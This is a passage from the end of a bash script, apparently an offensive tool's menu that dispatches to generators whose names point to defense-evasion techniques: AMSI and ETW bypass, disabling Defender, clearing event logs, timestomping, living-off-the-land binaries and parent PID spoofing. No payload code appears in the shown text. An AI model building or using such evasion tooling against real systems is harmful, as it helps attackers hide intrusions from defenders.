    echo -e "  ${CYAN}[7]${NC} Parent PID Spoofing (T1134.004)"
    echo ""
    read -p "Choose [1-7]: " OPT

    case "$OPT" in
        1) gen_amsi ;;
        2) gen_defender ;;
        3) gen_etw ;;
        4) gen_evtclear ;;
        5) gen_lolbin ;;
        6) gen_timestomp ;;
        7) gen_ppid ;;
        *) echo -e "${RED}[!] Invalid option${NC}" ;;
    esac
}

main
